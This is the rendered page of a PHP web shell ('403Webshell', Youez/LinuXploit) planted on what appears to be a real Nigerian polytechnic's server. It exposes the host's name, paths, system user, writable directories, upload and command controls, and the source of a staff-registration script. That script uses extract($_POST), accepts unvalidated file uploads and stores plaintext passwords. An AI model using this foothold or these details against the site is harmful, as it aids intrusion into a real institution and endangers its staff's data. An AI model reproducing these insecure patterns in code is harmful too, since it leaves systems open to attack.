403Webshell
Server IP : 172.64.80.1  /  Your IP : 108.162.241.67
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs/eClass/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs/eClass/staff_creation_process.php
<?php
/**
 * Created by PhpStorm.
 * User: adisa
 * Date: 2016-03-24
 * Time: 06:01 PM
 */
session_start();
extract($_POST);
//$matNo=$_SESSION['matNo'];
if($password==$password2) {


    require('../connect.php');
    $db = db_connect();

    $material = $_FILES['user_file1'];
    $folder = "image/";
    $material_name = $_FILES['user_file1']['name'];
    $material_type = $_FILES['user_file1']['type'];
    $material_tmp = $_FILES['user_file1']['tmp_name'];
    $material_size = $_FILES['user_file1']['size'];
    $old = $_FILES['user_file1']['tmp_name'];
    $staffID_pic = str_replace("/", "", $staffid);
    $new = "passport_staff/" . $staffID_pic . ".jpg";
    move_uploaded_file($old, $new);

//Retain Data
//`state` = '$txtstate', `lga` = '$lga',`dob` = '$dob',`gsm` = '$gsm',`sex` = '$sex',`address` = '$address',`email` = '$email',`gNames`='$gName',`gGSM`='$gGSM',`gAddress`='$gAddress',`homeTown`='$home'

//if ($txtschools=='Select Option...')$txtstate=$hState;
//if ($title=='') $lga=$hlga;
//if ($surname=='')$dob=$hdob;
//if ($othernames=='') $gsm=$hgsm;
//if ($staffid=='') $sex=$hsex;
//if ($gsm=='') $address=$haddress;
//if ($dob=='') $email=$hemail;
//if ($email=='') $gName=$hgNames;
//if ($dept=='') $gGSM=$hgNames;
//if ($password=='') $gAddress=$hgAddress;

    $names = $title . ' ' . strtoupper($surname) . ' ' . $othernames;
    $names = str_replace("'", "''", $names);
//End of data retain
//echo $staffid;
//echo $names;
//echo $gsm;
//echo $dob;
//echo $email;
//echo $txtschools;
//echo $dept;
//echo $password;
//echo $surname;


echo $result_insert="INSERT INTO `staff_biodata` (`sn`, `staffID`, `fullname`, `gsm`, `dob`, `email`, `school`, `dept`, `passworda`, `usernamea`) VALUES (NULL, '$staffid','$names','$gsm','$dob','$email','$txtschools','$dept','$password','$surname')";
// die();
    $result_insert = "INSERT INTO `staff_biodata` (`sn`, `staffID`, `fullname`, `gsm`, `dob`, `email`, `school`, `dept`, `passworda`, `usernamea`) VALUES (NULL, ?,?,?,?,?,?,?,?,?)";

    $result_insert_p = $db->prepare($result_insert);
    $result_insert_p->execute([$staffid, $names, $gsm, $dob, $email, $txtschools, $dept, $password, $surname]);
//$qry1=
//			  $result=$db->query("UPDATE `fedpoly`.`realdata` SET `state` = '$txtstate', `lga` = '$lga',`dob` = '$dob',`gsm` = '$gsm',`sex` = '$sex',`address` = '$address',`email` = '$email',`gNames`='$gName',`gGSM`='$gGSM',`gAddress`='$gAddress',`homeTown`='$home', `jambNo`='$jambNo' WHERE `realdata`.`matNo` ='$matNo'");
//$result=$db->prepare("UPDATE `fedpoly`.`realdata` SET `state` = ?, `lga` = ?,`dob` = ?,`gsm` =? ,`sex` =? ,`address` =? ,`email` =? ,`gNames`=?,`gGSM`=?,`gAddress`=?,`homeTown`=?, `jambNo`=? WHERE `realdata`.`matNo` =?");
//$result->execute([$txtstate,$lga,$dob,$gsm,$sex,$address,$email,$gName,$gGSM,$gAddress,$home,$jambNo,$matNo]);
//die();
    if ($result_insert_p) {
        header('location:' . 'staff_creation.php?id=1');
    } else {
        header('location:' . 'staff_creation.php?id=2');
    }


//$Query = "SELECT * FROM coursepool WHERE dept=? and levelID<=? and semester=? and instr('$SelSubjects',courseCode)>0";
//$stmt = $pdo->prepare($Query);
//$stmt->execute([$dept,$levelID,$semester]);
}else{
    header('location:' . 'staff_creation.php?id=3');
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit